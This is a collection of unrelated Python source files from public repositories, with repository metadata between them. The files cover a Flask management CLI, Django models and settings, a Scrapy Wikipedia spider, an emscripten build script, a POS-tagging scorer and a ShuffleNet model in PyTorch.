        indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
        inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
        # 10% of the time, we replace masked input tokens with random word
        indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
        random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
        inputs[indices_random] = random_words[indices_random]
        # The rest of the time (10% of the time) we keep the masked input tokens unchanged
        return inputs, labels
if __name__ == '__main__':
    # Smoke test: build a tokenizer from a local vocab file and construct the
    # trigram-masking collator with its default settings.
    vocab_data_path = "./vocab.txt"
    print("create tokenizer...")
    tokenizer = BertTokenizer(vocab_file=vocab_data_path)
    data_collator = DataCollatorForLanguageModelingWithNgram(
        tokenizer=tokenizer, mlm=True, mlm_probability=0.15, n_gram=3
    )
    print(data_collator)
| [
"feizhaoye@gmail.com"
] | feizhaoye@gmail.com |
26919ce61bc4cd179841fe1636c2052caf704c10 | 7d2df264115a103e7853c26405dd3a6812352553 | /manage.py | 15a142f12be08c0a7c58fceecf52831694364c7c | [] | no_license | stahlscott/race-support-backend | 8736d64535567ea6bc5c10ef3bd9a21fc7cf9580 | 31397674f7befea4b792eb6621f2f13dcc449b68 | refs/heads/master | 2020-05-24T22:41:13.439696 | 2019-05-21T00:49:13 | 2019-05-21T00:49:13 | 138,305,975 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,285 | py | # manage.py
import unittest
import coverage
from flask.cli import FlaskGroup
from project.server import create_app, db
from project.server.models import User, Event, Race, Rider
import subprocess
import sys
# Flask application instance plus a click CLI group bound to the same factory.
app = create_app()
cli = FlaskGroup(create_app=create_app)
# code coverage
# Coverage measurement starts at import time so the test runs triggered by
# the `cov` command below are recorded; reports are emitted by `cov`.
COV = coverage.coverage(
    branch=True,
    include="project/*",
    omit=[
        "project/tests/*",
        "project/server/config.py",
        "project/server/*/__init__.py",
    ],
)
COV.start()
@cli.command()
def create_db():
    """Creates a fresh copy of the database.

    Destructive: all existing tables (and their data) are dropped first.
    """
    db.drop_all()
    db.create_all()
    db.session.commit()
@cli.command()
def drop_db():
    """Drops the db tables (destructive; data is not recoverable)."""
    db.drop_all()
@cli.command()
def create_admin():
    """Creates the admin user.

    NOTE(review): credentials are hard-coded ("admin" / "fakeadmin") — fine
    for local development; confirm this command is never run in production.
    """
    db.session.add(User(email="admin", password="fakeadmin", admin=True))
    db.session.commit()
@cli.command()
def create_data():
    """Creates a set of sample data for testing."""
    # Two events: one active and one inactive, so both states can be tested.
    event = Event(name="Rochester Fakelocross", bikereg_id="1", active=True)
    event2 = Event(name="Rochester Fakecrit", bikereg_id="11", active=False)
    db.session.add_all([event, event2])
    db.session.commit()
    # Six race categories, all attached to the active event.
    race1 = Race(name="Cat 1 Mens", bikereg_id="2", event_id=event.id)
    race2 = Race(name="Cat 2 Mens", bikereg_id="3", event_id=event.id)
    race3 = Race(name="Cat 3 Mens", bikereg_id="4", event_id=event.id)
    race4 = Race(name="Cat 1 Womens", bikereg_id="5", event_id=event.id)
    race5 = Race(name="Cat 2 Womens", bikereg_id="6", event_id=event.id)
    race6 = Race(name="Cat 3 Womens", bikereg_id="7", event_id=event.id)
    db.session.add_all([race1, race2, race3, race4, race5, race6])
    db.session.commit()
    # Riders: the same rider may appear in several races with different bibs.
    riders = [
        Rider(
            name="Big Guy",
            email="blah@nope.com",
            usac="123",
            bib="11",
            race_id=race1.id,
        ),
        Rider(
            name="Big Guy",
            email="blah@nope.com",
            usac="123",
            bib="13",
            race_id=race2.id,
        ),
        Rider(
            name="Another Guy",
            email="blahr@nope.com",
            usac="124",
            bib="12",
            race_id=race1.id,
        ),
    ]
    db.session.add_all(riders)
    db.session.commit()
@cli.command()
def test():
    """Runs the unit tests without test coverage."""
    suite = unittest.TestLoader().discover("project/tests", pattern="test*.py")
    outcome = unittest.TextTestRunner(verbosity=2).run(suite)
    # Exit status mirrors the test outcome so CI can fail the build.
    sys.exit(0 if outcome.wasSuccessful() else 1)
@cli.command()
def cov():
    """Runs the unit tests with coverage."""
    suite = unittest.TestLoader().discover("project/tests")
    outcome = unittest.TextTestRunner(verbosity=2).run(suite)
    # Bail out early on failure; coverage reporting only runs on success.
    if not outcome.wasSuccessful():
        sys.exit(1)
    COV.stop()
    COV.save()
    print("Coverage Summary:")
    COV.report()
    COV.html_report()
    COV.erase()
    sys.exit(0)
@cli.command()
def flake():
    """Runs flake8 on the project."""
    # Lint the `project` package; flake8's output goes straight to stdout.
    subprocess.run(["flake8", "project"])
if __name__ == "__main__":
    # Delegate to the Flask/click CLI group defined above.
    cli()
| [
"scott@skiplist.com"
] | scott@skiplist.com |
2cac3d08334c146dd3333f471c8ee1fa6546c71d | bc9c1a4da0d5bbf8d4721ee7ca5163f488e88a57 | /research/urls.py | fe0aeb667e57278015b49196ad14403f92bec46d | [] | no_license | mit-teaching-systems-lab/newelk | 77f43666f3c70be4c31fdfc6d4a6e9c629c71656 | a2e6665bfcf9e2ea12fde45319027ee4a848f93c | refs/heads/master | 2022-12-13T20:50:17.632513 | 2019-10-03T19:02:01 | 2019-10-03T19:02:01 | 132,154,880 | 0 | 4 | null | 2022-12-08T01:26:56 | 2018-05-04T15:04:20 | Python | UTF-8 | Python | false | false | 222 | py | from django.urls import path
from . import views
urlpatterns = [
    # path('chatlogs/', views.streaming_chat_csv),
    # path('answerlogs/', views.streaming_answers_view),
    # Single active route, handled by views.toggle_feedback.
    path("feedback/", views.toggle_feedback)
]
| [
"bhanks@mit.edu"
] | bhanks@mit.edu |
3ca6956b11786854ba5ed8849b17496003024f52 | a82ef0fc466216c89878888346226ab5adac1349 | /make.py | 9312eda3205ca5aa7f1205c63119b1ebf3c3391a | [] | no_license | tchau4485/rawson.js | 885c6be0931b352f6e7b73ce54a295fbc5ed417f | f9de04f0cd28f8dcc1aad5cf8fbc3b369ec79fed | refs/heads/master | 2021-01-16T20:31:17.528303 | 2013-03-10T21:51:47 | 2013-03-10T21:51:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | #!/usr/bin/python
import os, sys, re, json, shutil
from subprocess import Popen, PIPE, STDOUT
exec(open(os.path.expanduser('~/.emscripten'), 'r').read())
sys.path.append(EMSCRIPTEN_ROOT)
import tools.shared as emscripten
# Config
emscripten.Settings.USE_TYPED_ARRAYS = 2
emscripten.Settings.CORRECT_OVERFLOWS = 0
emscripten.Settings.CORRECT_ROUNDINGS = 0
emscripten.Settings.CORRECT_SIGNS = 1
emscripten.Settings.OPTIMIZE = 2
emscripten.Settings.RELOOP = 1
emscripten.Settings.INIT_STACK = 0
emscripten.Settings.INVOKE_RUN = 0
emscripten.Settings.ASM_JS = 1
emscripten.Building.COMPILER_TEST_OPTS = ['-g']
# Build
print 'Build dcraw.js'
output = Popen([emscripten.EMCC, '-O2', '-s', 'ALLOW_MEMORY_GROWTH=1','-s', 'ASM_JS=1', '-g','-lm', '-o', 'build/dcraw.js','-DNODEPS','dcraw/dcraw.c'], stdout=PIPE, stderr=STDOUT).communicate()[0]
assert os.path.exists('build/dcraw.js'), 'Failed to build dcraw: ' + output
# re-introduced timezone bug in emscripten lib -
# date.toString() doesn't contain timezone in Windows *urgh*
bad_timezone_js = [
'winter.toString().match(/\(([A-Z]+)\)/)[1]',
'summer.toString().match(/\(([A-Z]+)\)/)[1]',
'date.toString().match(/\(([A-Z]+)\)/)[1]'
]
prepend_js = """
(function() {
var root;
root = (typeof exports !== "undefined" && exports !== null) ? exports : this;
"""
append_js = """
root.run = run;
root.FS = FS;
}());
"""
f = open('build/dcraw.js', 'r')
contents = f.read()
# hard-code timezones to UTC
for snippet in bad_timezone_js:
contents = contents.replace(snippet, '"UTC"');
f.close()
f = open('build/dcraw.js', 'w')
f.writelines([prepend_js,contents, append_js])
f.close()
Popen(['java', '-jar', emscripten.CLOSURE_COMPILER,
'--js', 'build/dcraw.js', '--js_output_file', 'build/dcraw.min.js'], stdout=PIPE, stderr=STDOUT).communicate()
| [
"fbuchinger@fbuchinger-ThinkPad-Edge.(none)"
] | fbuchinger@fbuchinger-ThinkPad-Edge.(none) |
07ca45b0d4fc80cdbfe1ba1c70137645fd5053db | 8a99fd853c98cb78174c1400fed6a00487c2d4e7 | /FizzBuzz.py | e2d5d81c30e904185abd0b92daa7c9572afe0bb9 | [] | no_license | ajkmonster/fizzbuzzpyth | a6b4cd5f022540e36711f19fd65f1b20bb61e32f | 4601cf801fe14c252b02eb7ccd680990f52cfe26 | refs/heads/master | 2020-05-06T15:19:01.602174 | 2019-04-08T15:56:19 | 2019-04-08T15:56:19 | 180,183,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | for x in range(1,100,1):
if x%5==0 & x%3==0:
print ('Fizzbuzz')
elif x%5==0:
print('Buzz')
elif x%3==0:
print('Fizz')
else:
print(x)
| [
"noreply@github.com"
] | noreply@github.com |
82b23cb422076185141456f57956768bf267521b | cc746a21c8c7f234c1ce71c5ac1ca67ff5f98469 | /students/yevhen_alexandr/imaginarium/game/models.py | a3fe801e09e911f68464553c7c5f1b87cf58e3b4 | [] | no_license | zdimon/wezom-python-course2 | 0dad698bcfc46b0959242f95df5c4ecdd1a441ba | d4f805849d02e7516c6806fa475d49ac4869240c | refs/heads/master | 2023-06-16T16:59:57.161205 | 2021-01-27T16:18:04 | 2021-01-27T16:18:04 | 322,817,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 612 | py | from django.db import models
from django.utils.safestring import mark_safe
class Page(models.Model):
    """A simple CMS page: a short title plus free-form body text."""
    title = models.CharField(max_length=250)
    content = models.TextField()
class Image(models.Model):
    """An uploaded image with an optional caption."""
    title = models.CharField(max_length=250, null=True, blank=True)  # optional caption
    image = models.ImageField(upload_to='images')  # stored under MEDIA_ROOT/images
    @property
    def image_tag(self):
        # 50px-high <img> preview; mark_safe stops Django from escaping the
        # HTML (the URL comes from our own storage backend, not user input).
        return mark_safe(f'<img height="50" src="{self.image.url}" />')
class Contact(models.Model):
    """A message submitted through the site's contact form."""
    name = models.CharField(max_length=255)
    email = models.EmailField(max_length=255)
    # NOTE(review): 255 characters may be short for a message body — confirm
    # a TextField was not intended here.
    message = models.CharField(max_length=255)
| [
"George_V@ua.fm"
] | George_V@ua.fm |
390ee336f83088e3f9b8609b7c854dfa3f4ea232 | 2e5e990955957cf04367ef6eedd62e6add7ccdc7 | /oms_cms/backend/api/v2/social_networks/serializers.py | 24a77bc22571a871c6dfb51890fd85f061a40858 | [
"BSD-3-Clause"
] | permissive | RomanYarovoi/oms_cms | 3dfcd19ff03b351dc754f73f4a0d8a9986cf28ec | 49c6789242d7a35e81f4f208c04b18fb79249be7 | refs/heads/master | 2021-07-06T18:49:51.021820 | 2020-10-15T05:52:55 | 2020-10-15T05:52:55 | 196,556,814 | 0 | 0 | BSD-3-Clause | 2020-10-15T05:52:57 | 2019-07-12T10:07:29 | JavaScript | UTF-8 | Python | false | false | 312 | py | from rest_framework import serializers
from oms_cms.backend.social_networks.models import SocialNetworks
class SocialNetworksSerializer(serializers.ModelSerializer):
    """Serialization of social networks (exposes every SocialNetworks field)."""
    class Meta:
        model = SocialNetworks
        fields = '__all__'
| [
"arsavit@gmail.com"
] | arsavit@gmail.com |
e3d72c1481cbc8561eafdf733425c7c3c0d61ef5 | ac8eb14f45dcdf3dba02cbb42fb848026f35e6a9 | /server/catalog/admin.py | 0fd6c91178354e6a59ca0d0f0b639eb0fb388517 | [] | no_license | kostisbourlas/pysearch | 0d9a68dd94f28fea5600d46e97ef7792c5ab9e08 | 391da36a27b58e9797bf9b7207d946b111bb520c | refs/heads/main | 2023-07-13T13:02:44.597945 | 2021-08-12T16:50:09 | 2021-08-12T16:50:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | from django.contrib import admin
from .models import Wine
@admin.register(Wine)
class WineAdmin(admin.ModelAdmin):
    """Django-admin configuration for Wine records."""
    # Fields shown on the change form; `id` is made read-only below.
    fields = (
        'id', 'country', 'description', 'points', 'price', 'variety', 'winery'
    )
    # Columns shown in the list view, with sidebar filters and default sort.
    list_display = ('id', 'country', 'points', 'price', 'variety', 'winery',)
    list_filter = ('country', 'variety', 'winery',)
    ordering = ('variety',)
    readonly_fields = ('id',)
| [
"kostisbourlas@protonmail.com"
] | kostisbourlas@protonmail.com |
7a61f5f44034c653d32cd5858fe9f6521bc38446 | 7936f2011261efa2d31b2b1f2a16eee9ba29a0cd | /article_scraper/article_scraper/spiders/wikipedia.py | 83b012fa6a501e0700101fa4707d4e29b04b746c | [] | no_license | gregorybohn620/RCATScrape | 746386ce671a67e5d53b9f05d45b987410409cee | 5bb0e4734712d6d05eb6c704e3493337fd56b685 | refs/heads/master | 2023-06-29T18:51:22.127161 | 2021-08-02T22:43:31 | 2021-08-02T22:43:31 | 392,110,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | import scrapy
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from article_scraper.items import Article
class WikipediaSpider(CrawlSpider):
    """Crawls English Wikipedia starting from the Kevin Bacon article.

    The link rule only follows article URLs whose path contains no ':'
    (which excludes namespaced pages such as File:/Talk:), yielding one
    Article item per visited page.
    """
    name = 'wikipedia'
    allowed_domains = ['en.wikipedia.org']
    start_urls = ['http://en.wikipedia.org/wiki/Kevin_Bacon']
    rules = [Rule(LinkExtractor(allow=r'wiki/((?!:).)*$'), callback='parse_info', follow=True)]
    def parse_info(self, response):
        """Extract title, URL and the last-modified footer text into an Article."""
        article = Article()
        # Prefer the plain <h1> text; fall back to italicised titles (<h1><i>).
        article["title"]= response.xpath('//h1/text()').get() or response.xpath('//h1/i/text()').get()
        article["url"]= response.url
        article["lastUpdated"] = response.xpath('//li[@id="footer-info-lastmod"]/text()').get()
        return article
return article
# scrapy runspider wikipedia.py -o articles.csv -t csv -s CLOSESPIDER_PAGECOUNT=10
| [
"gregorybohn620@utexas.edu"
] | gregorybohn620@utexas.edu |
2d4358e6df492ace9ba536ec9894210f4f6dd9a5 | 3ee6ec4eca2a03a58ae1d7cd7aa547fb724cbb43 | /part1/pos_scorer.py | 5c0487e5628a66acf1ba19f53951491553d9d9c9 | [] | no_license | tanvi5/Optical-character-recognition-and-POS-tagger | 01dcd41ce9e122a38c11c74fc8785947d0440e4b | dd5b3431eed6fbf3bd9db5ba2f43061cd8263e8d | refs/heads/master | 2020-04-13T11:15:47.303325 | 2018-12-26T10:49:26 | 2018-12-26T10:49:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,794 | py | #!/usr/bin/env python3
###################################
# CS B551 Fall 2018, Assignment #3
#
# Scoring code by D. Crandall
#
class Score:
    """Accumulates per-algorithm POS-tagging accuracy at word and sentence level."""

    def __init__(self):
        self.word_scorecard = {}        # algo name -> correctly tagged word count
        self.sentence_scorecard = {}    # algo name -> fully correct sentence count
        self.word_count = 0
        self.sentence_count = 0

    def score(self, algo_outputs, gt):
        """Compare each algorithm's label sequence in `algo_outputs` against ground truth `gt`."""
        self.word_count += len(gt)
        self.sentence_count += 1
        for algo, labels in algo_outputs.items():
            correct = sum(1 for j, tag in enumerate(gt) if tag == labels[j])
            self.word_scorecard[algo] = self.word_scorecard.get(algo, 0) + correct
            self.sentence_scorecard[algo] = self.sentence_scorecard.get(algo, 0) + (correct == len(gt))

    def print_scores(self):
        """Print cumulative word- and sentence-level accuracy for every algorithm."""
        print("\n==> So far scored %d sentences with %d words." % (self.sentence_count, self.word_count))
        print("    Words correct:     Sentences correct: ")
        for algo in sorted(self.word_scorecard):
            word_pct = self.word_scorecard[algo] * 100 / float(self.word_count)
            sent_pct = self.sentence_scorecard[algo] * 100 / float(self.sentence_count)
            print("%18s: %7.2f%% %7.2f%%" % (algo, word_pct, sent_pct))

    @staticmethod
    def print_helper(description, list, sentence):
        """Print `description` right-padded to 40 cols, then each label padded to its word's width."""
        cells = []
        for i in range(0, len(list)):
            width = max(4, len(sentence[i]))
            cells.append(("%-" + str(width) + "s") % list[i])
        print(("%40s" % description) + " " + " ".join(cells))

    @staticmethod
    def print_results(sentence, outputs, posteriors, models):
        """Print the sentence, then each algorithm's posterior scores and label sequence."""
        header = " ".join(["%7s" % model for model in models])
        Score.print_helper(header, sentence, sentence)
        for algo in sorted(outputs.keys()):
            scores = " ".join(["%7.2f" % posteriors[algo][model] for model in models])
            Score.print_helper(algo + " " + scores, outputs[algo], sentence)
| [
"noreply@github.com"
] | noreply@github.com |
48fb9be7fe206dd8b786ee8826e31648fa25db09 | 439e07d2fa9c016631e40d3fb191558066434245 | /search/exp.py | ae488175c73b0df4df2b4e4f93f73f386f8be945 | [] | no_license | AkashTalware/search_trailers | 72ddc242b4bb065377d48f5a88965d175737e148 | 602affc732340fb61fb9f70fe4c02dcf20702333 | refs/heads/master | 2023-04-26T02:37:27.653382 | 2021-04-07T10:51:31 | 2021-04-07T10:51:31 | 354,066,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | from pytube import YouTube
obj = YouTube("https://www.youtube.com/watch?v=ZrdQSAX2kyw")
strs = obj.streams.get_by_resolution(resolution="720p")
print(strs.mime_type)
# strm_all = obj.streams.filter(mime_type="video/mp4")
# l = {}
# l = {video for video in strm_all if video.resolution not in l.fromkeys("resolution")}
# for li in l:
# print(li)
# print(l) | [
"DK0031@digikull.com"
] | DK0031@digikull.com |
9589b6d1134195f2758af446807ba14035c231bb | e1878d2072e0aac22d1b9b1bac7a06b8b7af3eed | /models/shufflenet.py | 0a600b69d000a34744141fda16041929f3fe031e | [] | no_license | njuhuxw/B.2-image-classification-master | db747296cea8ae178349017d37b0d5280457202e | 6f10c2db7ec13e2f1b00c8f0b67e25e964fde862 | refs/heads/master | 2023-01-19T02:58:12.351546 | 2020-11-30T09:51:10 | 2020-11-30T09:51:10 | 311,579,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,438 | py | """shufflenet in pytorch
[1] Xiangyu Zhang, Xinyu Zhou, Mengxiao Lin, Jian Sun.
ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices
https://arxiv.org/abs/1707.01083v2
"""
from functools import partial
import torch
import torch.nn as nn
class BasicConv2d(nn.Module):
    """Standard conv block: Conv2d -> BatchNorm2d -> ReLU."""

    def __init__(self, input_channels, output_channels, kernel_size, **conv_kwargs):
        super().__init__()
        # Submodule names (conv/bn/relu) are kept so state_dict keys stay stable.
        self.conv = nn.Conv2d(input_channels, output_channels, kernel_size, **conv_kwargs)
        self.bn = nn.BatchNorm2d(output_channels)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        return self.relu(self.bn(self.conv(x)))
class ChannelShuffle(nn.Module):
    """Interleave channels across groups (the ShuffleNet channel shuffle)."""

    def __init__(self, groups):
        super().__init__()
        self.groups = groups

    def forward(self, x):
        batch, channels, height, width = x.size()
        per_group = int(channels / self.groups)
        # (N, g*n, H, W) -> (N, g, n, H, W): expose the group dimension.
        shuffled = x.view(batch, self.groups, per_group, height, width)
        # Swap the group and per-group axes, then flatten back so the
        # channels of different groups interleave.
        shuffled = shuffled.transpose(1, 2).contiguous()
        return shuffled.view(batch, -1, height, width)
class DepthwiseConv2d(nn.Module):
    """Depthwise convolution (pass groups=channels via kwargs) followed by BatchNorm."""

    def __init__(self, input_channels, output_channels, kernel_size, **conv_kwargs):
        super().__init__()
        # Submodule name `depthwise` is kept so state_dict keys stay stable.
        self.depthwise = nn.Sequential(
            nn.Conv2d(input_channels, output_channels, kernel_size, **conv_kwargs),
            nn.BatchNorm2d(output_channels),
        )

    def forward(self, x):
        return self.depthwise(x)
class PointwiseConv2d(nn.Module):
    """1x1 convolution followed by BatchNorm (no activation)."""

    def __init__(self, input_channels, output_channels, **conv_kwargs):
        super().__init__()
        # Kernel size is fixed at 1: this layer only mixes channels.
        self.pointwise = nn.Sequential(
            nn.Conv2d(input_channels, output_channels, 1, **conv_kwargs),
            nn.BatchNorm2d(output_channels),
        )

    def forward(self, x):
        return self.pointwise(x)
class ShuffleNetUnit(nn.Module):
    """One ShuffleNet unit (paper Fig. 2).

    Residual path: grouped 1x1 bottleneck (channels/4) -> channel shuffle ->
    3x3 depthwise conv (optionally strided) -> grouped 1x1 expand. Stride-1
    units with matching channel counts add the identity shortcut; otherwise
    the shortcut is average-pooled and the two paths are concatenated.
    """
    def __init__(self, input_channels, output_channels, stage, stride, groups):
        super().__init__()
        #"""Similar to [9], we set the number of bottleneck channels to 1/4
        #of the output channels for each ShuffleNet unit."""
        # NOTE: the attribute name `bottlneck` (sic) is kept because renaming
        # it would break loading of existing state_dict checkpoints.
        self.bottlneck = nn.Sequential(
            PointwiseConv2d(
                input_channels,
                int(output_channels / 4),
                groups=groups
            ),
            nn.ReLU(inplace=True)
        )
        #"""Note that for Stage 2, we do not apply group convolution on the first pointwise
        #layer because the number of input channels is relatively small."""
        # NOTE(review): this stage-2 override is byte-for-byte identical to
        # the assignment above (it still passes groups=groups), so it does
        # NOT implement the ungrouped first pointwise layer that the comment
        # describes — confirm whether groups=1 was intended here.
        if stage == 2:
            self.bottlneck = nn.Sequential(
                PointwiseConv2d(
                    input_channels,
                    int(output_channels / 4),
                    groups=groups
                ),
                nn.ReLU(inplace=True)
            )
        self.channel_shuffle = ChannelShuffle(groups)
        self.depthwise = DepthwiseConv2d(
            int(output_channels / 4),
            int(output_channels / 4),
            3,
            groups=int(output_channels / 4),
            stride=stride,
            padding=1
        )
        self.expand = PointwiseConv2d(
            int(output_channels / 4),
            output_channels,
            groups=groups
        )
        self.relu = nn.ReLU(inplace=True)
        self.fusion = self._add
        self.shortcut = nn.Sequential()
        #"""As for the case where ShuffleNet is applied with stride,
        #we simply make two modifications (see Fig 2 (c)):
        #(i) add a 3 × 3 average pooling on the shortcut path;
        #(ii) replace the element-wise addition with channel concatenation,
        #which makes it easy to enlarge channel dimension with little extra
        #computation cost.
        # Down-sampling unit: the expand conv only produces the *extra*
        # channels, so the concat with the pooled shortcut totals
        # `output_channels`.
        # NOTE(review): the pooled shortcut always uses stride 2 even when
        # `stride == 1` with mismatched channels — the two paths would then
        # differ in spatial size; confirm that configuration never occurs.
        if stride != 1 or input_channels != output_channels:
            self.shortcut = nn.AvgPool2d(3, stride=2, padding=1)
            self.expand = PointwiseConv2d(
                int(output_channels / 4),
                output_channels - input_channels,
                groups=groups
            )
            self.fusion = self._cat
    def _add(self, x, y):
        # Identity-shortcut fusion: element-wise sum.
        return torch.add(x, y)
    def _cat(self, x, y):
        # Down-sampling fusion: concatenate along the channel dimension.
        return torch.cat([x, y], dim=1)
    def forward(self, x):
        shortcut = self.shortcut(x)
        shuffled = self.bottlneck(x)
        shuffled = self.channel_shuffle(shuffled)
        shuffled = self.depthwise(shuffled)
        shuffled = self.expand(shuffled)
        output = self.fusion(shortcut, shuffled)
        output = self.relu(output)
        return output
class ShuffleNet(nn.Module):
    """ShuffleNet for 32x32 inputs (CIFAR-style stem with stride 1)."""

    def __init__(self, num_blocks, num_classes=10, groups=3):
        """
        Args:
            num_blocks: number of ShuffleNet units in stages 2, 3 and 4
            num_classes: size of the classifier output
            groups: group count for the grouped 1x1 convolutions

        Raises:
            ValueError: if `groups` is not one of the configurations from
                Table 1 of the paper (the original code hit an
                UnboundLocalError in that case).
        """
        super().__init__()
        # per-stage output widths from Table 1 of the paper, keyed by groups
        channel_table = {
            1: [24, 144, 288, 567],
            2: [24, 200, 400, 800],
            3: [24, 240, 480, 960],
            4: [24, 272, 544, 1088],
            8: [24, 384, 768, 1536],
        }
        if groups not in channel_table:
            raise ValueError(
                "groups must be one of {}, got {}".format(sorted(channel_table), groups))
        out_channels = channel_table[groups]
        self.conv1 = BasicConv2d(3, out_channels[0], 3, padding=1, stride=1)
        self.input_channels = out_channels[0]
        self.stage2 = self._make_stage(
            ShuffleNetUnit,
            num_blocks[0],
            out_channels[1],
            stride=2,
            stage=2,
            groups=groups
        )
        self.stage3 = self._make_stage(
            ShuffleNetUnit,
            num_blocks[1],
            out_channels[2],
            stride=2,
            stage=3,
            groups=groups
        )
        self.stage4 = self._make_stage(
            ShuffleNetUnit,
            num_blocks[2],
            out_channels[3],
            stride=2,
            stage=4,
            groups=groups
        )
        self.avg = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(out_channels[3], num_classes)

    def forward(self, x):
        """Stem -> stages 2-4 -> global average pool -> linear classifier."""
        x = self.conv1(x)
        x = self.stage2(x)
        x = self.stage3(x)
        x = self.stage4(x)
        x = self.avg(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return x

    def _make_stage(self, block, num_blocks, output_channels, stride, stage, groups):
        """make shufflenet stage

        Args:
            block: block type, shuffle unit
            num_blocks: how many blocks per stage
            output_channels: output depth channel number of this stage
            stride: the stride of the first block of this stage
            stage: stage index (an int, forwarded to each unit)
            groups: group number of group convolution

        Return:
            return a shuffle net stage
        """
        strides = [stride] + [1] * (num_blocks - 1)
        # BUG FIX: the original reused the name `stage` for this list, so
        # every unit received the list itself as its stage index and the
        # `stage == 2` special case in ShuffleNetUnit could never trigger.
        layers = []
        for block_stride in strides:
            layers.append(
                block(
                    self.input_channels,
                    output_channels,
                    stride=block_stride,
                    stage=stage,
                    groups=groups
                )
            )
            self.input_channels = output_channels
        return nn.Sequential(*layers)
def shufflenet():
    """Build the default ShuffleNet: 4/8/4 units in stages 2-4."""
    return ShuffleNet(num_blocks=[4, 8, 4])
| [
"852393503@qq.com"
] | 852393503@qq.com |
bd13e9dce56eb2014ae5589dc7d6718fb83209fa | cf32375a13c127b24277c115fe692fbd46c23edb | /gallery/gallery/settings.py | 268022e41fd1eb2c40ce7d720ae680ab13963b1e | [] | no_license | vivekmohbe/Gallery | 87cbd914d59b24d52de12555a27935540cb71616 | fc7199c9d2caa9e6f8a6cdefa2eef83c82c8caab | refs/heads/master | 2020-04-13T10:25:34.110275 | 2018-12-26T05:44:36 | 2018-12-26T05:44:36 | 163,138,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,754 | py | import os
#import posixpath
# Django settings for the gallery project.
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = '8ace3072-47a0-4910-b522-dc3601f38c35'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['0.0.0.0','127.0.0.1','localhost','gallery.velingeorgiev.pro']
INTERNAL_IPS = ('0.0.0.0','127.0.0.1','localhost',)
# Application definition: project app + material design admin + imagekit
# thumbnails + the Django contrib apps (incl. sitemaps/sites).
INSTALLED_APPS = [
    'app',
    'material',
    'material.admin',
    'imagekit',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.sitemaps',
    'django.contrib.sites'
]
SITE_ID = 1
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware'
]
ROOT_URLCONF = 'gallery.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages'
            ],
        },
    },
]
WSGI_APPLICATION = 'gallery.wsgi.application'
# Single-file SQLite database stored next to manage.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
LOGIN_REDIRECT_URL = '/admin/'
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = False
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/1.8/howto/static-files/deployment/
# python manage.py collectstatic
#STATIC_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['static/']))
STATIC_ROOT = BASE_DIR + '/static/'
MEDIA_URL = '/media/'
#MEDIA_ROOT = posixpath.join(*(BASE_DIR.split(os.path.sep) + ['media/']))
MEDIA_ROOT = BASE_DIR + '/media/'
# Log all django DEBUG+ messages to a file beside the project root.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': BASE_DIR + '/debug.log',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['file'],
            'level': 'DEBUG',
            'propagate': True,
        },
    },
}
# In-process memory cache (per-process, not shared between workers).
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
        'LOCATION': 'unique-snowflake',
    }
}
# SMTP settings; host/user/password are left blank here.
